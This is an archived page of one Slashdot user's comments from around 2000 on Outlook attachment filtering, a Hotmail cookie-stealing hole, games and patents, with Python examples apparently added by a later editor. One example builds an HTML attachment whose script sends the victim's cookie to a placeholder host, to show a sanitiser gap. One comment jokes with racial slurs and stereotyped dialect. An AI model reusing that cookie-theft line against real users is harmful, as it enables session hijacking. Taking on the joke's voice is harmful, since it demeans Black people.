Slashdot Mirror


User: sammy+baby

sammy+baby's activity in the archive.

Stories
0
Comments
1,765
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 1,765

  1. Re:"Security levels" for attachments on Microsoft Develops Security-Path for Outlook · · Score: 2
    Viruses aren't spread by people you don't know anymore, they're spread by your stupid, clueless friends and family!

    Very true, and a really good point. However, don't make the assumption that my loved ones would go into my "trusted user" list. My network admins, co-sysadmins, and a few other technical professionals I know might make that list. My mother? No way.

    (That's not to say that somebody's mother isn't going to make that list. Just not mine.)

  2. ZIP files on Microsoft Develops Security-Path for Outlook · · Score: 2

    Actually, ZIP files are addressed: Outlook now pops open a message warning the user that the file may contain evil Blue Meanies (or words to that effect). It's really more of a deterrent than anything else, but it's a better deterrent than was there before.

    Except, of course, CAB, ARJ, TAR, and GZIP files don't carry an equivalent warning. Such is life when you're inside the box, so to speak.

  3. "Security levels" for attachments on Microsoft Develops Security-Path for Outlook · · Score: 5

    Okay, folks, stop saying "Hey, they took attachments out of Outlook!" Here's what actually happened:

    The MS patch revolves around defining various types of security levels for attachments. At present, they only define two levels. At level 1 (.exe, .com, .vbs, et cetera), the attachment is deleted. Poof. Gone.

    At level two (just .zip files), opening the attachment shows a warning to the effect of, "Hey, this file, it could be really really bad, so be careful before you open it, okay?"

    Obvious weaknesses:

    1. The .zip file attachment filter is absolutely ludicrous: anyone with a copy of WinZip can also open .arj, .cab, .tar, and .gzip files (and probably a full other types to boot). None of those file types are addressed.
    2. Executable files that you want distributed are nuked. Outta luck.
    3. This patch breaks functionality with a whole bunch of software. I don't know if this was avoidable (can't make an omelette without breaking some eggs), but it sucks.

    What the release gets right:

    IE does have a pretty nifty security model in that it offers multiple layers of trust for various sites/domains (trusted, "Internet", restricted, custom). Anything sent by e-mail is now assumed to be from the "restricted" zone, unless manually reset. I'd prefer to see a per-user trust level for e-mail, but that can only come with the widespread adoption of an authentication model (like PGP, for example), which I don't see happening yet.
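The two-level scheme described above, as an added example that is this editor's code and not the patch itself: an extension-keyed filter of the kind the comment describes, beside a variant that recognises archive containers by their leading bytes so that a CAB, ARJ or tar gets the same warning as a ZIP. The level-1 extension set, the magic-byte table and the sample attachments are assumptions constructed for illustration, not Microsoft's actual lists.

```python
# Added example (this editor's code, not the patch the comment describes):
# the two-level, extension-keyed scheme beside a container-aware variant.
# The extension sets and magic-byte table are assumptions for illustration,
# not Microsoft's actual lists.
import posixpath

LEVEL1_DELETE = {".exe", ".com", ".vbs", ".bat", ".scr", ".pif"}  # assumed level-1 set
LEVEL2_WARN = {".zip"}                                            # level 2: .zip only

# (offset, signature) for containers a WinZip-class tool opens; all are public formats.
ARCHIVE_MAGIC = {
    "zip":  (0, b"PK\x03\x04"),
    "gzip": (0, b"\x1f\x8b"),
    "cab":  (0, b"MSCF"),
    "arj":  (0, b"\x60\xea"),
    "tar":  (257, b"ustar"),
}


def extension_of(filename):
    return posixpath.splitext(filename.lower())[1]


def by_extension(filename):
    """The scheme as the comment describes it: the decision rests on the name alone."""
    ext = extension_of(filename)
    if ext in LEVEL1_DELETE:
        return "delete"
    if ext in LEVEL2_WARN:
        return "warn"
    return "allow"


def sniff_container(data):
    """Return the archive format whose signature matches, or None."""
    for name, (offset, sig) in ARCHIVE_MAGIC.items():
        if data[offset:offset + len(sig)] == sig:
            return name
    return None


def by_content(filename, data):
    """Hardened variant: keep the level-1 name rule, but apply the level-2 warning
    to any recognised archive container, whatever it is called."""
    if extension_of(filename) in LEVEL1_DELETE:
        return "delete"
    if sniff_container(data) is not None:
        return "warn"
    return "allow"


# Constructed attachments: just enough header bytes to be sniffed.
SAMPLES = [
    ("report.zip", b"PK\x03\x04" + b"\0" * 26),
    ("report.cab", b"MSCF" + b"\0" * 32),
    ("backup.tar", b"\0" * 257 + b"ustar\0" + b"\0" * 100),
    ("setup.exe",  b"MZ" + b"\0" * 62),
    ("notes.txt",  b"just text"),
]


def compare(samples=SAMPLES):
    """Map each filename to (by_extension verdict, by_content verdict)."""
    return {name: (by_extension(name), by_content(name, data)) for name, data in samples}


if __name__ == "__main__":
    for name, (ext_verdict, content_verdict) in compare().items():
        print(f"{name:12} extension={ext_verdict:6} content={content_verdict}")
```

Run stand-alone it prints both verdicts side by side: the CAB and tar samples pass the name-based filter untouched and are caught only by the content-based one. Sniffing is still no substitute for a name rule on executables (level 1 is kept as-is), and a real deployment would also want to look inside the container rather than just recognise it.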

  4. Re:One more company to NOT buy games from.... on No More Unreal Ports For Linux? · · Score: 3

    Oh, please.

    First of all, don't jump to the conclusion that games written for Linux are necessarily going to be better performers, either where netplay or graphics are concerned. Most graphics cards these days have better OOTB support for Windows, hands down. All things being equal, that translates to better performing games. And where netplay is concerned, that varies highly from game to game. Compare Unreal's unpatched netplay to the latest patchlevel, or to UT's. Compare either to Q3. On the same hardware, with the same OS.

    Second, don't be ridiculous about "refusing to allow Linux ports." Companies like Loki don't politely knock on the doors of game companies and go, "Hey there, mind if we port your game for you? We'll only be a minute." Loki gets paid to do it. That's fine - they provide a service to their customers and they deserve the right to charge for it. But the folks at Blizzard aren't being evil because they don't feel like paying for a Linux port of the game.

    If Loki can show that they can sell enough copies of a game for Linux, Blizzard will likely change their minds. Until then, don't have a hissyfit at Blizzard for looking out for their bottom line. This may come as a shock to you, but Blizzard, Loki, and the publishers of every game you're likely to find at the local Best Buy are, in fact, in it for the money.

  5. Re:Is it only a Hotmail hole? on Another Hole in Hotmail · · Score: 2

    Not automatically: the items still have to be selected in order to be viewed. However, that's enough for the script to run and capture session data.

  6. The actual nature of the Hotmail hole on Another Hole in Hotmail · · Score: 5

    Contrary to the reporting on /., the most recent Hotmail hole is in no way related to a VBS script. What's so alarming about the hole is that it is actually an HTML file which contains the exploit. More specifically:

    The folks over at Hotmail were smart enough to filter out JavaScript from HTML formatted messages sent to Hotmail recipients. They did not, however, think that it would be necessary to filter HTML attachments, either. As a result, a clever individual was able to construct an HTML page containing JavaScript which forwards HotMail authorization cookies to a third party.

    Ironically, this information is largely reproduced from the article on Peacefire cited in the original post. No mention of VBS files anywhere.
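The filtering gap described above, as an added example that is this editor's code and not Hotmail's: a script filter applied only to the inline HTML body, beside the same filter applied to every text/html part of the message, attachments included. The MIME message, the placeholder collector host and the regex-based sanitiser are constructed for illustration; the point is the scope of the filter, not the quality of the regex.

```python
# Added example (this editor's code, not Hotmail's): a script filter applied
# to the inline HTML body only, beside the same filter applied to every
# text/html part, attachments included. The message and the host name in the
# attachment are constructed for illustration.
import re
from email.message import EmailMessage

SCRIPT_RE = re.compile(r"<script\b.*?</script\s*>", re.I | re.S)
HANDLER_RE = re.compile(r"""\s+on\w+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""", re.I)


def strip_scripts(html):
    """Stand-in for a real sanitiser: drop <script> blocks and on*= handlers."""
    return HANDLER_RE.sub("", SCRIPT_RE.sub("", html))


def build_message():
    """Constructed sample: a harmless inline body plus an HTML attachment that
    ships the script. The collector host is a placeholder."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "see attached"
    msg.set_content("plain-text fallback")
    msg.add_alternative("<p>Hi! Open the attachment.</p>", subtype="html")
    attachment = (
        "<html><body>Loading...<script>"
        'new Image().src = "http://collector.example.invalid/?c=" + document.cookie;'
        "</script></body></html>"
    )
    msg.add_attachment(attachment, subtype="html", filename="page.html")
    return msg


def html_parts(msg):
    """Yield (label, html) for each text/html part the recipient can open."""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            yield part.get_filename() or "inline-body", part.get_content()


def sanitize(msg, include_attachments):
    """include_attachments=False reproduces the gap the comment describes."""
    out = {}
    for label, html in html_parts(msg):
        if label != "inline-body" and not include_attachments:
            out[label] = html              # attachment passed through untouched
        else:
            out[label] = strip_scripts(html)
    return out


def parts_with_script(sanitized):
    """Labels of parts that still carry script after sanitising."""
    return sorted(label for label, html in sanitized.items()
                  if SCRIPT_RE.search(html) or HANDLER_RE.search(html))


if __name__ == "__main__":
    m = build_message()
    print("body-only filter leaves script in:", parts_with_script(sanitize(m, False)))
    print("all-parts filter leaves script in:", parts_with_script(sanitize(m, True)))
```

Anything the webmail front end will render as HTML under its own origin, whether it arrived as the body or as an attachment, has to go through the same sanitiser; a practitioner would also prefer an allowlisting HTML parser over regex stripping, which is only used here to keep the example self-contained.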

  7. Re:Hackers vs. Crackers! on On Usage of "Hacker vs. Cracker" · · Score: 2

    Hush yo' mouth!

  8. The Zend optimizer on Which CGI Language For Which Purpose? · · Score: 2

    For those of you who care about such things: the Zend optimizer for PHP is free as in beer, not speech. Please refer to http://www.zend.com/zend/optimizer.php

  9. As much as your favorite game requires on NVIDIA Geforce 2 Review · · Score: 2

    In essence, this boils down to a matter of taste. You seem to be saying that all of the games which really require that level of graphic support aren't really your cup of tea, but for tens of thousands of people, it is precisely their cup of tea.

    On the RTS front, while it was certainly a playable-as-hell game, I heard plenty of people complain that their brand new, whopping fast machine was limited to 800x600 in Starcraft, just because Starcraft couldn't go any higher. Myth was the first (fairly) recent game to really start to reverse that trend: Homeworld tried to completely stand it on its ear.

    As magnificent a game as I thought Homeworld was, I really did feel that it was limited to some degree by the constraints of the technology: many strike craft + many ion cannons = big framerate losses.

    So, in other words, pay attention: I'm predicting that newer RTS games will will benefit from better tech more than their predecessors did.

  10. Give Quake its due on Daikatana Goes Gold! · · Score: 2

    I'm not sure you're giving Quake its due. You're right in that the plot was absolutely forgettable, but there were genuine moments of absolute terror for me in that game: the first time I saw (and heard) those zombies get back up, or when I first found myself toe-to-toe with a shambler.

    It also was the first FPS to be genuinely playable over the internet, Kali notwithstanding. Not to mention the polygonal critters. And truly 3d environments, as opposed to the sort of stacked-2d method that the Dooms used.

    Every game they've released since then seems to have been a case of diminishing returns. Quake was a major step forward for the FPS genre, if only for the polygonal critters and environments. Q2 was Q1 with a plot, better graphics, and lower latency. Q3... urgh. I was really disappointed by Q3.

    I think maybe that Romero could foresee where this was all heading, which is what created his dissatisfaction with id software. It's a pity that Daikatana doesn't look like it's going to come near being the game he thought it would be.

    Actually, what am I saying? Any man with hair like that deserves what he gets.

  11. The ultimate crime. on 2600 Asks: Is Mafiaboy Real? · · Score: 4

    Legend has it that the really good crackers never say anything and are never known to the world. I don't know if that's really true or not (how could you verify it, really?), but everyone else brags a lot.

    Someone once asked Alfred Hitchcock what the ultimate crime was. His response: "The one we haven't heard about yet."

    Seems apropos.

  12. Re:Grep & Find in the real world on Library Of Congress Will Not Digitize Books · · Score: 2

    Well, yeah. But this at least would save me the trouble of finding out by actually talking to them.

  13. Grep & Find in the real world on Library Of Congress Will Not Digitize Books · · Score: 2

    Me too. Not to mention "find". I could walk into a room and do this:

    find /usr/local/room -type f -perm 777 -size 7 -exec grep -l "thing for short furry Jewish guys" \{} \;

    Think how much time (and rejection) that would save!

  14. Young Lando plays it safe. on Star Wars EP1 On DVD Confirmed By Lucas · · Score: 2

    I have this image of Lando, at age seven, as a tough-talking gangsta wanna-be, before learning that you can catch more flies with honey and evolving into soopa-slick Billy Dee.

    "You say people gonna die? I'll tell you who's gonna die - it's always the white Naboo who start wars, and the black men who get killed. F**k that s**t, b***h, this n***a ain't fighting!"

    I would have paid serious money to see that.

  15. Re:Detection on Security-Why Not Watch The Crackers? · · Score: 2

    Spafford and Garfinkel wrote "Practical Unix and Internet Security," also a recommended read.

  16. Obligatory comment: on IBM Runs 41,000 Copies of Linux on Mainframe · · Score: 1

    Whoa! Can you imagine what kind of a 'l33t Beowulf cluster you could do with this? I mean, you wouldn't even have to have separate boxes! You could just run 'em all on the same machine!

    </comment>

  17. The whole Amazon / Patent thing on Richard Stallman Audio Interview at Wired · · Score: 2
    [IMHO]RMS needs to lighten his stance against Amazon. I think Jeff Bezos's reply to Tim O'Reilly's open letter did a good job of explaining why Amazon had to get the patents it did.

    I have to disagree here. Bezos' letter does concede that patents can indeed be harmful to innovation, but offers no reason for why his patents should stand, other than to say "I don't believe it would be right for us to [relinquish those patents]... even though the vast majority of our competitive advantage will continue to come not from patents, but from raising the bar on things like service, price, and selection." Note that Bezos could have argued that 1-Click (or any of the other patents which Amazon holds) were sufficiently innovative and distinctive to merit their own patents: he did not.

    Stallman's criticism is that Bezos cannot (and, as nearly as I can tell, did not) argue that his patent was acquired for purely defensive reasons. A defensive patent is never used to launch a lawsuit. Protecting your business investment is one thing: suing someone is quite another.

  18. Re:What's the big deal? on Four Arrested For Internet 'Theft' At OSU · · Score: 2
    Consider that the $24 price difference is not a fee but a discount for having a room without an ethernet connection.

    Enh. I don't buy it. Let's say you own an apartment building which is fully wired, and operate a little ISP for the tenants. The fee for this service is included in the bill, but if someone doesn't want to make use of it, they can take a deduction on their rent instead. If you find out that someone has run a patch cable into another apartment to steal the access there... well, shame on you for having left the port connected, but it still seems pretty clear that the guy is willfully taking something he should've paid for.

    Also consider that the right to use campus computing resources doesn't extend to all of those resources. Students aren't allowed administrative access to billing records, for example. Likewise, OSU had offered a service as part of their housing package, with a discount for individuals who didn't want to / couldn't take advantage of it. Can't have your cake and eat it too.

    That said, OSU is going to have its hands full explaining why other students who did the same thing (by bringing laptop computers to the port, instead of running long cables) aren't guilty of the same charge, or why the computer labs in the residence hall are in such poor shape.

  19. Re:Libel? on Mattel/Cyber Patrol Censors Critics Again · · Score: 2

    Unlikely. Such a tactic would force Mattel to explain why the product doesn't block Yahoo, or AltaVista, or any one of a thousand directories or search engines which link to pornographic or "questionable" content. It's just too thin.

  20. Bugtraq, for one. on 'Experts' Back To Claiming Open Source Insecure · · Score: 3
    Check out the archives on Bugtraq (available at SecurityFocus.com). Although I wasn't able to find much during the 5 minutes or so I spent trying to navigate their irritatingly counterintuitive web site, I was able to locate documentation on a backdoor to 3Com switches. I also know (from having previously subscribed to that list) that it's far from the only back door intentionally left in a product.

    Even our highly clueful friends at id were caught with their hands in the cookie jar. Carmack later went on record as saying that leaving the back door in the finished product was a dumb idea, and that he regretted the decision.

  21. Re:Proof possible? on Grok Goldbach, Grab Gold · · Score: 2

    Erg. Sorry, wrong answer.

    Mathematics is replete with proofs about infinite sets of numbers. My personal favorite (mostly because I actually understand it) is Cantor's hypothesis:

    Cantor wanted to prove that even though there's an infinite number of integers, and an infinite number of "real" numbers, there are clearly more real numbers than integers. So he devised this infinitely large list. You take every real number (even ones of infinite length) and write them down on a convenient piece of infinitely large graph paper, one digit per square. Finally, you number each one in the left hand column with a counting number (positive integer).

    Now, since you've used graph paper, you can show that there's a real number not on the list. You start at the first real number, take the digit in the first column, and change it to something else. Go to the second number, take the digit in the second column, and change it. And so on, and so forth, blah blah, nth digit from nth number, etc. In the end, you have a new real number which can't be duplicated anywhere on the list, because it's sure to vary from every other number by at least one digit. Furthermore, even if you add the new number to the bottom of the list, you haven't solved the problem: you can make a brand new number which still doesn't appear anywhere on the list just by repeating the process. This kind of proof utilizes what's called a "diagonalization method", since the number you wind up constructing can be viewed by drawing a diagonal line across the list of reals you made up.

    Anyway, this is getting way too long. The upshot: there are plenty of examples in mathematics of people making proofs about infinite sets of numbers, and they don't have to sit down with calculators for an infinite length of time to write them. More to the point, since no one actually can enumerate all of the primes (because there are infinitely many of them, see), no computer program is going to be solving this one any time soon.
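The diagonal construction sketched above, as an added example that is this editor's code and not part of the comment: each row is a string of decimal digits standing in for one line of the "graph paper", the i-th digit of row i is changed, and the result is checked to differ from every row. The sample rows are constructed for illustration. The example goes one step beyond the comment in that the replacement digits avoid 0 and 9, which keeps the constructed number from coinciding with a listed one through a 0.4999... = 0.5000... double representation.

```python
# Added example (this editor's code, not from the comment): the diagonal
# construction carried out on a finite prefix of the imagined list, with each
# row a string of decimal digits standing in for the "graph paper".

def digit_at(row, i):
    """i-th digit of a row, reading missing positions as 0 (trailing zeros)."""
    return row[i] if i < len(row) else "0"


def diagonal(rows):
    """Return a digit string whose i-th digit differs from rows[i]'s i-th digit.
    Replacement digits avoid 0 and 9 so the result cannot coincide with a listed
    number through a 0.4999... = 0.5000... double representation."""
    return "".join("5" if digit_at(row, i) != "5" else "6"
                   for i, row in enumerate(rows))


def differs_from_every_row(rows, new):
    """Check the property the argument relies on: position i separates new from row i."""
    return all(digit_at(row, i) != digit_at(new, i) for i, row in enumerate(rows))


def extend_and_repeat(rows):
    """Append the diagonal number and run the construction again, as the
    comment describes; the extended list still misses a real."""
    extended = rows + [diagonal(rows)]
    return extended, diagonal(extended)


# Constructed rows: fractional digits of a few reals, truncated.
ROWS = ["1415926", "7182818", "4142135", "0000000", "5555555"]

if __name__ == "__main__":
    d = diagonal(ROWS)
    print(d, differs_from_every_row(ROWS, d))
    ext, d2 = extend_and_repeat(ROWS)
    print(d2, differs_from_every_row(ext, d2))
```

On a finite list the construction only shows a number missing from that list; the argument's force comes from the fact that it works for any enumeration, however it was drawn up, which the code cannot show but the checker makes concrete for a given list.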

  22. VA Stock on Bryar Takes On Patents And Their Friends · · Score: 2
    This is way off topic, so feel free to moderate down. However:
    In other Andover-related news, the stock of the parent company, VA Linux, dropped below 100 for the first time today. This continues the screaming dive from the high of 320 only last December. How low can it go?

    This is to be expected. The initial reaction of the market to VA's IPO could only have been described as (with apologies to Greenspan) irrational exuberance. The only reason they had such a huge first day run-up was because the market thinks Linux is nifty. After it starts to occur to people that in a lot of ways, VA looks suspiciously like any other OEM, they'll start to wonder why they threw all that money at it in the first place.

  23. Re:What about the rest? on A Free, High Quality On-Line University? · · Score: 2

    Um. I think that the quote was intended as, "Okay, that's one billionaire putting his money to good use. What about the rest [of the billionaires]?"

  24. Re:Linux in the schools on Linux & Education - How To Get It For Your School · · Score: 2

    Most importantly, grab a few articles about Linux from non-technical publications: for example, Forbes ran a great cover story not terribly long ago on Linus Torvalds. Once you can demonstrate that "big-media" is covering Linux, your teachers will be less likely to dismiss it as some weird geeky fad.

  25. Looking at the arguments on Wildcard DNS, Session Management And Prior Art · · Score: 2

    Good points, good article. I'm not sure I agree with all of the points it raises, though.

    The author states that "Location Poisoning disables proxy servers, DNS caching and other mechanisms that reduce the amount of net traffic." This is true, but the situation isn't as dire as you might think at first blush. Without having any numbers to back up my claim, I'm going to assert that in the average web transaction (from DNS lookup to the last request fulfillment on a single page), transmission of images takes up the vast majority of the bandwidth used. If the page author serves images from a central location (<img src="http://images.etcetra.org/blah.gif">) they'll still be cached normally by web proxies. So, it's bad, but it can be mitigated somewhat by clever design.

    On the other hand, I detest what this does to bookmarks. Bleah.

    In the end, I don't see this technology as having much value, even if you strip out all the negatives. Even if you don't have to screw around with passing cookies or GET args as session identifiers, you still need to change state in your database for any reasonably useful application (read: shopping cart). If you can set something like that up, then there's no reason you couldn't have set up some other, less objectionable form of session management.